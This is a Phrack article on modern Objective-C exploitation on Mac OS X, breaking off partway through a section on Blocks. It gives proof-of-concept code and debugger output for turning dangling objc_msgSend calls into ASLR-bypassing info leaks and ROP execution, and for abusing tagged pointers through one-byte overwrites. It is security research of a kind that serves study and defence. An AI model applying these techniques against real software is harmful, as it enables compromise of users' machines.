==Phrack Inc.==

              Volume 0x0f, Issue 0x45, Phile #0x09 of 0x10

|=-----------------------------------------------------------------------=|
|=-----------=[ Modern Objective-C Exploitation Techniques ]=------------=|
|=-----------------------------------------------------------------------=|
|=----------------------------=[ by nemo ]=------------------------------=|
|=-----------------------=[ nemo@felinemenace.org ]=---------------------=|
|=-----------------------------------------------------------------------=|

--[ Introduction

Hello again reader. Over the years the exploitation process has obviously
shifted in complexity. What once began with the straightforward case of
turning a single bug into a reliable exploit has now evolved more towards
combining vulnerability primitives together in an attempt to bypass each
of the memory protection hurdles present on a modern-day operating system.

With this in mind, let's jump once again into the exploitation of
Objective-C based memory corruption vulnerabilities in modern times.

Back in Phrack 0x42 (Phile #0x04) I wrote a paper documenting a way to
turn the most common Objective-C memory corruption primitive (an attacker
controlled Objective-C method call) into control of EIP. If you have not
read this paper, or if it's been a while and you need to refresh, it's
probably wise to do so now, as the first half of this paper will only
build on the techniques covered in the original [1].

Contrary to the beliefs of Ian Beer, the techniques in the original paper
are still alive and kicking in modern times, however some adjustment is
needed depending on the context of the vulnerability.

--[ Dangling Objective-C Method Calls

As you're aware since you read my paper in [1], Objective-C method calls
are implemented by passing "messages" to the receiver (object) via the
objc_msgSend() API call. When Objective-C objects are allocated, storage
for their instance variables is allocated on the native heap with
malloc().
The first element in this space is a pointer to the class definition in
the binary. This is typically referred to as the "ISA" pointer. As in: "an
NSString 'IS-A' NSObject".

When dealing with bugs in Objective-C applications it is extremely common
for this ISA pointer to be attacker controlled, resulting in an
Objective-C method call being performed on an attacker controlled memory
location. This can occur when dealing with Use-After-Free conditions, heap
overflows into Objective-C objects, and even format bugs using the %@
format string character.

In my original paper [1] I wrote about how to utilize this construct to
perform a successful cache lookup for the selector value, resulting in
control of EIP. An alternative route to gain EIP control is to make the
Objective-C runtime think that it's finished looking through the entire
cache and found no match for the SEL value passed in, in which case the
runtime will attempt to resolve the method's address via the class
definition (through the controlled ISA pointer) and once again use an EIP
value from memory controlled by us. This method is longer however, and
adds little benefit. But I digress; both of these methods are still
completely valid in the most current version of Mac OS X at this time,
Yosemite (10.10).

While, at the time of the Phrack 0x42 release, this technique was fairly
useful by itself, in modern times EIP/RIP control is only a small victory
and in no way wins the battle of process control. This is due to the fact
that even with direct control of EIP, modern NX and ASLR make it difficult
to know a reliable absolute location in which we can store a payload and
return to execute it.
From what I've seen, the most commonly used technique to bypass this
currently is to combine an EIP control primitive with an information leak
of a .text address in order to construct a ROP chain (returning repeatedly
into the text segment) which either executes the needed functionality,
mprotect()'s some shellcode before executing it, or loads an existing
executable or shared library.

Under the right conditions, it is possible to skip some of these steps and
turn a dangling Objective-C method call into both an information leak and
execution control. In order to use this technique, we must first know the
exact binary version in use on the target. Thankfully on Mac OS X this is
usually pretty easy, as automatic updates mean that most people are
running the same binary version.

The specifics of the technique differ depending on the architecture of the
target system, as well as the location of the particular SEL string which
is used in the dangling method call construct. Since we are already
familiar with 32-bit internals, we will begin our investigation of
dangling objc_msgSend() exploitation with the 32-bit runtime, before
moving on to look at the changes in the new runtime on 64-bit.

--[ 32-bit dangling objc_msgSend()

Firstly, 32-bit processes utilize the old Objective-C runtime, so the
specifics of the internals are identical to what is documented in my
original paper. However, depending on the location of the module
containing the selector string, the technique varies slightly.

----[ 32-bit Shared Region

The shared region is a mapping which is common to all processes on the
system. The file '/var/db/dyld/dyld_shared_cache_i386' is mapped into this
space. This file is generated by the "update_dyld_shared_cache" utility
during system update, and contains a large selection of libraries which
are commonly used on the system. The .paths files in
"/var/db/dyld/shared_region_roots" dictate which files are contained
within.
The order in which each library is added to this file is randomized,
therefore the offset into the file for a particular library cannot be
relied on. Reading the file '/var/db/dyld/dyld_shared_cache_i386.map'
shows the order of these files. For 32-bit processes, this file is mapped
at the fixed address 0x90000000. At this location there is a structure
which describes the contents of the shared region.

This technique, once again, revolves around the ability to control the ISA
pointer, and to point it at a fake class struct in memory. In order to
demonstrate how this works, a small sample Objective-C class was created
(shown below). The complete example of this technique is included at the
end of this paper in the uuencoded files blob.

[leakme.m]

  #import "leakme.h"

  @implementation leakme

  -(void) log
  {
          printf("lol\n");
  }

  @end

In main.m, we create an instance of this object, and then use sprintf() to
write out a string representation of the object's address, before
converting it back with atol(). This is pretty confusing, but it's
basically an easy way to trick the compiler into giving us a void pointer
to the object. Type casting the object pointer directly will not compile
with gcc.

  printf("[+] Class @ 0x%lx\n",l);
  sprintf(num,"%li",l);
  long *ptr = (long *)atol(num);
  ...
  printf("[+] Overwriting object\n");
  *ptr = (long)&fc; // isa ptr

By overwriting the ISA pointer with the address of an allocation we
control, we can easily simulate a vulnerable scenario. Obviously in the
real world things are not that easy. We need to know the address of an
allocation which we control. There are a variety of ways this can be
accomplished. Some examples of these are:

 - Using a leak to read a pointer out of memory.
 - Abusing language weaknesses to infer an address. [2]
 - Abusing the predictable nature of large allocations.

However, these concepts are the topic of many other discussions and not
relevant to this particular technique.
As a quick refresher, the first thing the Objective-C runtime does when
attempting to call a method for an object (objc_msgSend()) is to retrieve
the location of the method cache for the object. This is done by
offsetting the ISA pointer by 0x20 and reading the pointer at this
location. To control this cache pointer we use the following structure:

  struct fakecache {
          char pad[0x20];
          long cache_ptr;
  };

In the example code we use a separate allocation for the fakecache struct
and the cache itself. However in a real scenario the address of the cache
itself would most likely be the same address as the fakecache offset by
0x24. This would allow us to use a single allocation, and therefore a
single address, reducing the constraints of the exploit. Also, in a real
world case we could leak the address of the cache_ptr, then subtract 0x20
from its address. This would allow us to shave 0x20 bytes off of the
buffer we need to control.

Next, objc_msgSend() traverses the cache looking for a cached method call
matching the desired implementation. This is done by iterating through a
series of pointers to cache entries. Each entry contains a SEL which
matches the cached method SEL in the .text segment of the Objective-C
binary. By comparing this SEL value with the SEL value passed to
objc_msgSend() the matching entry can be located and used.

Rather than iterating through every pointer to find the appropriate cache
entry each time however, a mask is applied to the selector pointer. The
masked off bits are then shifted and used as an index into the cache table
entry pointer array. Starting from this index, each entry is inspected in
turn. This means that multiple entries can have the same index, however it
greatly reduces the search time of the cache. Controlling the mask
provides us with the mechanism we need to create a leak.

Ok, so going back to the mask. In my original Objective-C paper, we set
the mask to 0.
This forced the runtime to look directly past the mask regardless of what
value the SEL had. In this case however, we want to abuse the mask in
order to isolate the "randomized" unpredictable bits in the selector
pointer value (SEL). Below, we can see a "real" SEL value from a 10.10
system, which is located in the shared region.

  (lldb) x/s $ecx
  0x90f3f86e: "length"

Since we know that the shared region begins at 0x90000000 we know that the
first nibble will always be 0x9. We also know that the offset into the
page which contains the SEL will always be the same, therefore the last 3
nibbles 0x86e will be the same for the binary version we retrieve the SEL
value from. However, we cannot count on the rest of the SEL value being
the same on the system we are running our exploit against.

For the value 0x90f3f86e we can see the bit pattern looks as follows:

     9    0    f    3    f    8    6    e
  1001 0000 1111 0011 1111 1000 0110 1110 : 0x90f3f86e

Based on what we just discussed, the mask which would retrieve the bits we
care about looks as follows:

     0    f    f    f    f    0    0    0
  0000 1111 1111 1111 1111 0000 0000 0000 : 0x0ffff000

However, since objc_msgSend() shifts the SEL 2 to the right prior to
applying the mask, we must shift our mask to account for this. This leaves
us with:

     0    3    f    f    f    c    0    0
  0000 0011 1111 1111 1111 1100 0000 0000 : 0x03fffc00

As you remember, objc_msgSend() applies the following calculation to
generate the index into the cache entries:

  index = (SEL >> 2) & mask

Filling in the values for this leaves us with an index like:

  index = (0x90f3f86e >> 2) & 0x03fffc00 == 0x3cfc00

This means that for our particular SEL value the runtime will index
0x3cfc00 * 4 (0xf3f000) bytes forward, and take the bucket pointer from
this location. It will then dereference the pointer and check for a SEL
match at that location. By creating a giant cache slide containing entries
for every possible combination of the randomized bits, we can make sure
that this location always contains the right bucket pointer.
In the 32-bit runtime (the old runtime) the cache index is used to
retrieve a pointer to a cache_entry from an array of pointers (buckets).
In our example code (main.m) we set the buckets array up as follows:

  long *buckets = malloc((CACHESIZE + 1) * sizeof(void *));

However, in a typical exploitation scenario, this array would be part of
the single large allocation which we control.

For each of the buckets pointers, a cache entry must be allocated. In the
example code we can use the following struct for each of these entries:

  struct cacheentry {
          long sel;
          long pad;
          long eip;
  };

Each of these structures must be populated with a different SEL and EIP
value depending on its index into the table. For each of the possible
index values, we add the (unshifted) randomized bits to the SEL base. This
way the appropriate SEL is guaranteed to match after the mask is applied
and used to index the table.

For the EIP value, we can utilize the fact that the string table
containing the SEL string is always going to be relative to the .text
segment within the same binary. The diagram below shows this more clearly.

  ,_______________,<--- Mach-O base address
  |               |
  | mach-o header |
  +---------------+
  |               |<--- SEL in string table, relative to base
  | string table  |        /\  Relative offset
  +---------------+        \/  from SEL to ROP gadgets
  |               |<--- ROP gadget in .text segment
  | .text segment |
  '---------------'

For each possible entry in the table, the EIP value must be set to the
appropriate address relative to the SEL value used. The quickest way I
know to calculate these values is to break on the objc_msgSend function
and dump the current SEL value. In lldb this is simply a case of using
"reg read ecx". Next, "target module list -a $ecx" provides us with the
module base. By subtracting the module base from the absolute SEL address
we can get the relative offset within the module. This can be repeated for
the gadget address within the same module.
Next, when populating the table, we simply need to add these two relative
offsets to our potential module base candidate. We increment the module
base candidate for each entry in the table. By populating our cache slide
in this way we are guaranteed the execution of a single ROP gadget within
the module that our SEL is in. This can be enough for us to succeed. We
will look into ways to use this construct later.

Obviously the allocation used for this 32-bit technique is very large. To
calculate the size of the cache slide which we need to generate we need to
look at the size of the shared region. The shared region always starts at
0x90000000, but the first module inside the shared region starts at
0x90008000. The end of the shared region depends on the number of modules
loaded in the shared region. On the latest version of Mac OS X at this
time, the end of the shared region is located at 0x9c391000. The bit
patterns for these are shown below.

  10010000 00000000 10000000 00000000 :: SR START       -- 0x90008000
  10011100 00111001 00010000 00000000 :: SR END         -- 0x9C391000
  00001111 11111111 11110000 00000000 :: MASK UNSHIFTED

If we compare this to the unshifted mask, and mask off the bits we care
about we get the following values for our potential index values.

  00000000 00000000 00100000 00000000 -- smallest index value - 0x2000
  00000011 00001110 01000100 00000000 -- biggest index value  - 0x30E4400

Since the buckets array is an array of 4 byte pointer values we can
multiply the largest index by 4, giving us 0xc391000. Each cache entry
pointed to by a bucket is 12 bytes in size. This means that the size of
the cache entry array is 0x24ab3000. By adding these two values together
we get the total size of our cache slide, 0x30e44000 bytes.

Allocations of this size can be difficult to make depending on the target
application. However, also due to the size, they are predictably placed
within the address space. This buffer can be made from JavaScript for
example.
----[ Uncommon 32-bit Libraries

Libraries which are not contained within the shared region are mapped in
by the linker when an executable is loaded that requires them as a
dependency. The location of these modules is always relative to the end of
the executable file, and they are loaded in the order specified in the
LC_LOAD_DYLIB headers.

When loading the executable file, the kernel generates a randomized slide
value for ASLR. This value is added to the desired segment load addresses
in the executable (if it's compiled with PIE) and then the executable is
re-based to that location.

  uintptr_t requestedLoadAddress = segPreferredLoadAddress(i) + slide;

The slide value is calculated by the kernel and then passed to the main
function of the dynamic loader. The following algorithm is responsible for
generating the slide value.

  aslr_offset = (unsigned int)random();
  max_slide_pages = vm_map_get_max_aslr_slide_pages(map);
  aslr_offset %= max_slide_pages;
  aslr_offset <<= vm_map_page_shift(map);

where:

  uint64_t
  vm_map_get_max_aslr_slide_pages(vm_map_t map)
  {
          return (1 << (vm_map_is_64bit(map) ? 16 : 8));
  }

  int
  vm_map_page_shift(vm_map_t map)
  {
          return VM_MAP_PAGE_SHIFT(map);
  }

  #define VM_MAP_PAGE_SHIFT(map) \
          ((map) ? (map)->hdr.page_shift : PAGE_SHIFT)
  #define PAGE_SHIFT      I386_PGSHIFT
  #define I386_PGSHIFT    12

So for example, a random() value of 0xdeadbeef would end up as the value
0xef000, with the following calculation:

  slide = ((0xdeadbeef % (1<<8)) << 12)
  slide = 0xef000

The gcc compiler and llvm both (by default) use a load address of 0x1000
for the text section of an executable. So for the slide value 0xef000 the
executable file would be based at 0x1000 + 0xef000 = 0xf0000.

This means that for the most part, you're dealing with roughly 1 byte of
unpredictable bits. Depending on the number of libraries loaded which are
outside of the shared region, this fluctuates, however libraries are
always loaded in the order stipulated by the executable itself, so this is
fairly predictable.
For our dangling objc_msgSend technique this means that our mask
fluctuates depending on the target. In the best case, masking off the
single byte in the address can be achieved by using the mask
(0x000ff000 >> 2) == 0x3fc00.

--[ 64-bit dangling objc_msgSend()

The 64-bit version of this technique is quite different to its 32-bit
brethren. This is mostly due to the fact that 64-bit processes use a whole
new version of the runtime.

In the new runtime, the objc_class structure is no longer a basic C
structure. Instead it uses C++ intrinsics to include methods. The memory
footprint for the new class is shown below.

  struct objc_class : objc_object {
      // Class ISA;
      Class superclass;
      cache_t cache;           // formerly cache pointer and vtable
      class_data_bits_t bits;  // class_rw_t * plus custom rr/alloc flags
      ...
  }

The cache_t struct looks as follows:

  struct cache_t {
      struct bucket_t *_buckets;
      mask_t _mask;
      mask_t _occupied;
      ...
  }

and a bucket_t struct looks like:

  struct bucket_t {
  private:
      cache_key_t _key;
      IMP _imp;
      ...
  }

Putting this together, the main thing that has changed regarding the cache
lookup is that, rather than an array of pointers to cache entries, there
is simply a single pointer to an array of SEL + method address entries at
offset 0x10 into the structure. Following this, there's the mask, followed
by an occupied field indicating that entries in the cache exist.

The critical difference in the runtime is the way the mask is used to
index into this table. Rather than the (SEL >> 2) value in the 32-bit
runtime, the index is calculated via ((SEL & mask) << 4). This means, if
we were to abuse the mask in a similar way to the 32-bit technique we
would need a mask of 0xffff0000 in order to isolate the randomized bits.
Obviously even if we were able to make an allocation big enough to contain
the cache slide necessary for this, it would be such a time consuming act
to populate 4gb worth of cache entries to catch the index that this is not
really a feasible process. Instead we must utilize an additional
characteristic of the new runtime. The objc_msgSend() call at a high level
looks as follows:

  ISA = *class_ptr;
  offset = ((SEL & ISA->mask) << 4);

  while(ISA->buckets[offset].SEL != 0) {
          if(ISA->buckets[offset].SEL == SEL) {
                  return ISA->buckets[offset].method(args);
          } else {
                  offset--;
                  continue;
          }
  }

This means that if we once again create a large slide containing entries
for all possible randomized bits, we simply need to point (using the index
we control) the runtime to the end of our slide, and let it walk backwards
until it finds a match.

----[ 64-bit Shared Region

In order to investigate this technique, we will begin again by looking at
the shared region in 64-bit processes. The shared region starts at the
address 0x7FFF80000000. Once again a cache file is mapped in, this time
from /var/db/dyld/dyld_shared_cache_x86_64. This file is, once again,
randomized upon creation, however in 64-bit processes there is also a
random slide added to the file when it is mapped in. This is calculated
using sizeof(shared_region) - sizeof(cache file) as the max. As far as our
technique goes however, this does not really change very much.

Calculating the mask value for this technique can be challenging. There
are a few constraints which we must work against in order to index our
bucket list to the last entry. To investigate this we will take a typical
SEL value, 0x00007fff99f88447. The bit pattern is broken down below.

  SEL: 0x00 00 7f ff 99 f8 84 47

  00000000 00000000 01111111 11111111
  10011001 11111000 10000100 01000111

Unfortunately the mask variable is only 4 bytes long. This means that the
predictable bits in the upper 32-bits of the SEL are not available to us.
Also, the last 12 static bits (offset into page - 0x447) would result in
an index that is too small. If we used those bits we would not have a
large enough offset to index to the end of the slide.

Luckily, we have one single static bit (0x80000000) in the lower 32-bits
which we can count on being set. We can take advantage of this bit with
the following mask.

  Mask: 0x00 00 00 00 80 00 00 00

  00000000 00000000 00000000 00000000
  10000000 00000000 00000000 00000000

Applying this mask to any SEL value within the shared region will
guarantee the offset 0x80000000. Clearly this value is way beyond the end
of our required slide, however since we also control the pointer to the
bucket slide, we can subtract (0x80000000 - sizeof(cache)) from the
pointer value to force it to point to the right location.

The example code main64.m demonstrates this technique. In this code, we
use a fakecache structure to control the initial cache lookup. A pad is
used to correctly position the bucket pointer and mask.

  struct fakecache {
          char pad[0x10];
          long bucketptr;
          long mask;
  };

Next, we allocate an array of cache entry structs in order to hold our SEL
slide. Obviously in a real attack all these elements would be in a single
allocation, however for this example we will split them up for clarity.

  struct cacheentry {
          long sel;
          long rip;
  };

  struct cacheentry *buckets =
          malloc((NUMBUCKETS+1) * sizeof(struct cacheentry));

Initializing each of these elements is simply a case of incrementing the
random value added to the SEL each time, and populating each entry. Again,
the RIP value is calculated by adding a relative offset to the SEL in
order to locate our ROP gadget.

  for(slide = 0; slide < NUMBUCKETS ; slide++) {
          buckets[slide].sel = BASESEL + (slide * 0x1000);
          buckets[slide].rip = buckets[slide].sel - 75654446;
  }

----[ Uncommon 64-bit Libraries

Once again, libraries which are not within the shared region are mapped
directly after the executable image in memory.
Typically the text segment address generated by the compiler is
0x100000000. The same code is used to generate the slide that we looked at
earlier in the 32-bit section. Here is an example of a slide for a 64-bit
process with the random() value of 0xdeadbeef.

  slide = ((0xdeadbeef % (1<<16)) << 12)
  slide = 0xbeef000

  example SEL = 0x10beef447

As you can see, in this example, there is no predictable bit in the lower
32-bits of the SEL which we can rely on to index to the end of our table.
Our only option here is to utilize the random bits in the SEL. We can do
this by repeating the entire spectrum of randomized values in our slide
multiple times. This way, depending on the value of the random bits, a
different offset will occur into the slide, however in most scenarios it
will result in finding one instance of the correct entry.

--[ Single Gadget Exploitation Strategies

Now that we've looked at how to get execution to a predictable location of
our choice, the next step is to look at some ways to utilize this to our
advantage. Obviously there is an abundance of ways that this can be
utilized, but the following 3 methods are ways that I have seen succeed in
real life.

----[ Return SEL Gadget

At the moment when we gain execution control using this technique, a
register contains the SEL pointer value. We can use this fact to our
advantage. For example, for 32-bit code, the following gadget could take
advantage of this.

  00000000  89C8              mov eax,ecx
  00000002  5E                pop esi
  00000003  5D                pop ebp
  00000004  C3                ret

The gadget above moves the SEL pointer value into the eax register;
obviously on function return this register is treated as the return value.
Next it restores ESI and EBP from the stack and uses the ret instruction
to return from the function. This results in, rather than the expected
return value for whatever Objective-C method was dangling, the SEL value
being returned.
This is only a useful approach if we are able to retrieve the value from
this context and utilize it to re-trigger the bug. In the example code
provided, the use of this gadget causes the SEL value to be printed,
rather than the length of the NSString which is intended. You can see the
result of this below.

  -[nemo@objcbox:code]$ ./leak
  [+] buckets is 0x10000000 size.
  [+] cacheentry is 0x30000000 size.
  [+] Setting up buckets
  [+] Done
  [+] Class @ 0x78622240
  [+] Overwriting object
  [+] Calling method
  String length: 0x93371b88

Likewise, in some cases it may not make sense to return the SEL directly.
If it is not possible to retrieve the leaked value upon return, it may
make more sense to execute a gadget which writes ecx somewhere in memory.
For example in a web browser context, writing the ecx register into a
JavaScript array which is attacker controlled may result in the ability to
"collect" this value from JavaScript context and re-trigger the bug.

----[ Self Modifying ROP

Another potential use of the single gadget execution primitive is to use
the ecx register containing SEL to modify the rest of a ROP chain prior to
pivoting to use it. I have never personally been successful with this,
however I have seen this done in a friend's exploit. Finding a gadget
which accomplishes all this is extremely challenging.

----[ Arbitrary Write Gadget

The final method for using a single gadget to continue the exploitation
process is to turn the execution primitive into an arbitrary write
primitive. It is usually fairly straightforward to find a gadget which
allows you to write any high value to a fixed location. By positioning
something at this location (eg 0x0d0d0d0d) this single write can be
leveraged to escalate the available functionality. For example, in a web
context, positioning a JavaScript array or string at this location then
writing to the length field can be enough to gain an arbitrary read/write
primitive from JavaScript.
This is easily enough to finish the exploitation process. Outside of the
browser context there are still a variety of length encoded data types
which can be used for this. Specific to Objective-C, the
NSMutableArray/NSArray classes work this way.

--[ Tagged Pointers

One of the new features added to the Objective-C runtime is the usage of
"tagged pointers" to conserve resources. Tagged pointers take advantage of
the fact that the system memory allocator will align pointers handed out
on natural alignment boundaries. This means that the low bit will never be
set.

  (lldb) print (long)malloc_good_size(1)
  (long) $0 = 16

The runtime takes advantage of this low bit in order to indicate that the
pointer value is not to be treated as a regular pointer; instead, bits 1-3
are used as an index into a table of potential ISA pointers, registered
with the system. The remaining 60 bits can then be used to store the
object payload itself inline.

  Tagged pointer layout

  11111111 11111111 11111111 11111111
  11111111 11111111 11111111 1111[111][1]
                                   |   |
                                   | tag
                                 index

As mentioned, the index bits index into a table of potential object types.
The default types registered with the runtime are shown below.

  OBJC_TAG_NSAtom            = 0,
  OBJC_TAG_1                 = 1,
  OBJC_TAG_NSString          = 2,
  OBJC_TAG_NSNumber          = 3,
  OBJC_TAG_NSIndexPath       = 4,
  OBJC_TAG_NSManagedObjectID = 5,
  OBJC_TAG_NSDate            = 6,
  OBJC_TAG_7                 = 7

It is possible for a developer to add their own types to the table,
however it is very uncommon for anyone to do this. The guide at [3]
clearly illustrates the mechanics of tagged pointers, if you require more
information.

Now that we've looked at how tagged pointers work, we will investigate
some of them from an exploitation perspective.

----[ Tagged NSAtom

NSAtom is an extremely handy object type for exploitation. In order to use
a tagged NSAtom, we simply need the low bit set, indicating a tagged
pointer, and then no bits set in the index bits. The value 0x1 by itself
for example will satisfy this.
The beautiful thing about the NSAtom class is that calling any method name
on this class will result in success. The example code below simply calls
the method initWithUTF8String on the object 0x1. Clearly this is not a
valid pointer, and instead it is treated as an NSAtom. Any method name
could be used and the result would still be 1.

  int main(int argc, const char * argv[])
  {
          printf("[+] NSAtom returned: %u\n",
                  [1 initWithUTF8String:"lol"]);
          return 0;
  }

  $ ./nsatom
  [+] NSAtom returned: 1

As you can imagine, this behavior can be extremely useful for CoE
(continuation of execution) or general exploitation. An example scenario
would be: if you are forced to write through several Objective-C object
pointers on the path to an overwrite target, any method call on those
objects would require valid pointers/fake object setup. However with the
NSAtom tagged pointer type, simply replacing these pointers with the value
0x1 can be enough to stop the crash and take advantage of the overwrite
target. Also, in extremely specific cases, the fact that this object
returns true can be used to manipulate the path of the program.

----[ Tagged NSString

The next tagged pointer type we will investigate is the tagged NSString.
With the new runtime, when an NSString is created, the size of the string
during initialization dictates the type of storage for the string. Strings
which are greater than 7 bytes in length are stored on the heap in a
typical Objective-C NSString object. However, for strings of 7 bytes or
less, a tagged pointer with the index 2 is used. The bit pattern for a
tagged NSString is shown below. It is comprised of 7 bytes of string data,
followed by 4 bits for the length, 3 bits for the index into the tagged
pointer types array, and finally the low bit to indicate tagged pointer
type.
  <-------------------[ String Data ]-------------------->
  11111111111111111111111111111111111111111111111111111111[1111][010][1]
                                                          [strlen]  |  |
                                                                    | tag
                                                                index: 02

The first scenario in which we can abuse the properties of a tagged
NSString is a partial overwrite into an untagged NSString. The example
code included with this paper (nsstring1.m) demonstrates this. In this
code (shown below) we create an NSString (s) using the C string contents
"thisisaverylongstringnottagged". Since this is not 7 or less bytes in
length, this string is stored on the heap, and the object pointer points
to this. We use the character pointer (ptr) to simulate a 1 byte write
into the least significant byte of the object pointer. This condition can
occur from either a controlled overflow, or an actual 1 byte off-by-one.
We write the value 0xf5 to this byte, and then print the length and
contents of the string.

  int main(int argc, const char * argv[])
  {
          NSString *s = [[NSString alloc]
                  initWithUTF8String:"thisisaverylongstringnottagged"];

          char *ptr = (char *)&s;
          *ptr = 0xf5; // NSString Tagged

          printf("[+] NSString @ 0x%lx\n",(unsigned long)s);
          printf("[+] String length: 0x%lx\n",(unsigned long)[s length]);
          NSLog(@"%@",s);
          return 0;
  }

The value 0xf5 in the least significant byte has the following bit
pattern:

  [1111][010][1]

As you can see, this leaves us with a string length of 0xf, an index of
0x2 and the LSB set to indicate a tagged pointer. By only using a partial
overwrite, we have left the first 7 bytes of the pointer untouched. As you
can see from the output below, the length of the string is 0xf (15) after
this overwrite. This means that when NSLog() attempts to print the string
contents, 15 bytes of data are pulled out starting from the inline data.
This leaks the address of the object. If our target allows us to retrieve
a string value and use it, we can turn a one byte overwrite into an info
leak primitive.
    $ ./nsstring1
    [+] NSString @ 0x7fc0db4116f5
    [+] String length: 0xf
    2015-04-04 07:47:26.815 nsstring1[13335:92489992] eeeeeee 3eIjuaj

The next scenario which we will investigate involves overflowing into
a tagged NSString, rather than an untagged variant. The example code
nsstring2.m demonstrates this. In this code, we initialize an
NSString with the contents "AAAAAAA". Since this is only 7 bytes of C
string, it guarantees that the NSString will be a tagged type. This
means it will contain the value:

    0x4141414141414175

Essentially the first 7 bytes are taken up by our "A" contents. The
last byte contains the length (7) followed by the bit pattern
indicating the NSString type of tagged pointer. Next, we once again
simulate a single-byte overflow into the object pointer. This time we
write the value 0x00, which is a common primitive in real life due to
off-by-one string operations. This forcefully unsets the tagged LSB
in the pointer, turning the tagged string into an untagged type.
Finally we call the length method on the object.

    int main(int argc, const char *argv[])
    {
        NSString *s = [[NSString alloc] initWithUTF8String:"AAAAAAA"];
        char *ptr = (char *)&s;

        *ptr = 0x00; // un-tag

        printf("[+] NSString @ 0x%lx\n", (unsigned long)s);
        printf("[+] String length: 0x%lx\n", (unsigned long)[s length]);
        NSLog(@"%@", s);
        return 0;
    }

As you can imagine, the runtime now treats our tagged object as
untagged. This means that the tagged pointer is now treated as a real
pointer. If we were able to control the contents of the NSString on
initialization, this would present us with direct control over the
object cache lookup, allowing us to use the construct presented
earlier in the paper to turn this into code execution.
    (lldb) r
    Process 13636 launched: './nsstring2' (x86_64)
    [+] NSString @ 0x4141414141414100
    Process 13636 stopped
    * thread #1: tid = 0x5834fc3, 0x00007fff96c210d7
      libobjc.A.dylib`objc_msgSend + 23, queue = 'com.apple.main-thread',
      stop reason = EXC_BAD_ACCESS (code=EXC_I386_GPFLT)
        frame #0: 0x00007fff96c210d7 libobjc.A.dylib`objc_msgSend + 23
    libobjc.A.dylib`objc_msgSend + 23:
    -> 0x7fff96c210d7: andq (%rdi), %r11
       0x7fff96c210da: movq %rsi, %r10
       0x7fff96c210dd: andl 0x18(%r11), %r10d
       0x7fff96c210e1: shlq $0x4, %r10
    (lldb) reg read rdi
        rdi = 0x4141414141414100

----[ Tagged NSNumber

As you can imagine, the NSNumber case is very similar to that of the
NSString. Any number value which can be contained in the first 7
bytes of the pointer is stored inline as a tagged NSNumber, rather
than performing an allocation and storing the number on the heap.

The sample code nsnumber1.m demonstrates, once again, a single-byte
overwrite which turns an object pointer into a tagged pointer
containing an inline NSNumber. In this code, we begin by
instantiating an NSNumber containing the value 0xdeadbeeffeedface.
The contents of this number are unimportant; what matters is that the
number is clearly too large to fit into the upper bytes of a tagged
pointer, so this NSNumber is stored on the heap in typical
Objective-C fashion. Next, we write the value 0xf7 to the low byte of
the object pointer. Once again this converts the untagged object
pointer into a tagged type, while leaving the upper bits intact.
Finally, we log the contents of the number using the
unsignedLongLongValue method.
    int main(int argc, const char *argv[])
    {
        NSNumber *n = [NSNumber numberWithInteger:0xdeadbeeffeedface];
        char *ptr = (char *)&n;

        *ptr = 0xf7;

        NSLog(@"0x%lx\n", (unsigned long)[n unsignedLongLongValue]);
        return 0;
    }

As you can see from the output below, rather than printing the
initialized contents (0xdeadbeeffeedface), the NSLog call displays
the object pointer value itself, once again creating an information
leak of this value.

    $ ./nsnumber1
    2015-04-04 09:26:58.701 nsnumber1[14663:92514549] 0x7fd6134116

The final tagged pointer example, nsnumber2.m, demonstrates the
counter case to this. In this code an NSNumber is instantiated
containing the value 0x0041414141414141. As you can see from the
leading NULL byte, this value is small enough that it fits within the
first 7 bytes of the object pointer. Therefore, this object is
created as a tagged pointer with the value:

    0x4141414141414107

We once again truncate the final byte using a character pointer,
removing the tagged bit before calling a method
(unsignedLongLongValue) on it.

    int main(int argc, const char *argv[])
    {
        NSNumber *n = [NSNumber numberWithInteger:0x0041414141414141];
        char *ptr = (char *)&n;

        *ptr = 0x00;

        NSLog(@"0x%lx\n", (unsigned long)[n unsignedLongLongValue]);
        return 0;
    }

When the method call is made, the runtime treats the number's
contents as a pointer, leaving us with a dangling Objective-C message
send which we can once again abuse to control execution.
    Process 14636 launched: './nsnumber2' (x86_64)
    Process 14636 stopped
    * thread #1: tid = 0x583a67f, 0x00007fff96c210d7
      libobjc.A.dylib`objc_msgSend + 23, queue = 'com.apple.main-thread',
      stop reason = EXC_BAD_ACCESS (code=EXC_I386_GPFLT)
        frame #0: 0x00007fff96c210d7 libobjc.A.dylib`objc_msgSend + 23
    libobjc.A.dylib`objc_msgSend + 23:
    -> 0x7fff96c210d7: andq (%rdi), %r11
       0x7fff96c210da: movq %rsi, %r10
       0x7fff96c210dd: andl 0x18(%r11), %r10d
       0x7fff96c210e1: shlq $0x4, %r10
    (lldb) reg read rdi
        rdi = 0x4141414141414100

----[ Additional Tagged Types

The remaining types in the table each have unique properties. I will
leave it as an exercise for the reader to investigate how each of
these types can be used from an exploitation perspective.

--[ Blocks

So, Apple being Apple, decided the tried and tested C standard wasn't
good enough for their magical super fantastic operating system and
went ahead and modified it. They did this by adding a new construct
called Blocks. For anyone familiar with anonymous subroutine
references in Perl, or lambda functions in Python, this is
essentially what a Block is. You can read about Blocks in detail in
Apple's guide [4]. TL;DR though: a Block uses the "^" operator to
declare a special type of function pointer whose body can be defined
inline. This is mostly a syntactic feature, but it has a few runtime
uses as well. Blocks can be passed to other functions just like
function pointers, and can access global data, or data relative to
the executing state in which they are defined. Syntactically, Blocks
are very similar to ECMAScript closures; internally, however, they
function a little differently, as you'll see.

--[ Sample Block Code

Ok, let's take a look at how Blocks are defined.
Apple's guide [4] provides the following little example:

    int main(int ac, char **av)
    {
        int multiplier = 7;
        int (^myBlock)(int) = ^(int num) {
            return num * multiplier;
        };

        printf("%d\n", myBlock(3));
    }

As you can see, this code defines a Block called myBlock which takes
an integer argument "num" and multiplies it with a value "multiplier"
taken from the stack of the main function where the Block was
declared. myBlock is then called with the value 3. As expected, when
executed the Block is entered and returns the multiplication 7 * 3.

    -[dcbz@squee:~/code/blocks]$ gcc block.c -o block
    -[dcbz@squee:~/code/blocks]$ ./block
    21

Note that nothing fancy is needed to compile this; Apple's built-in
compiler supports Blocks out of the box.

At first glance, I expected this feature to be purely syntactic. I
thought the compiler would create a function and then just insert a
call instruction in the appropriate places, or maybe a function
pointer if reassignment was required. However, if we walk through the
assembly listing for this trivial program, we can see that is not
even close to the case. First we have the basic function prologue, as
expected...

    EntryPoint:
        push rbp                ; XREF=0x100000e2f
        mov  rbp, rsp
        sub  rsp, 0x50

Next argv/argc are moved into stack variables.

    mov rax, rsi
    mov ecx, edi
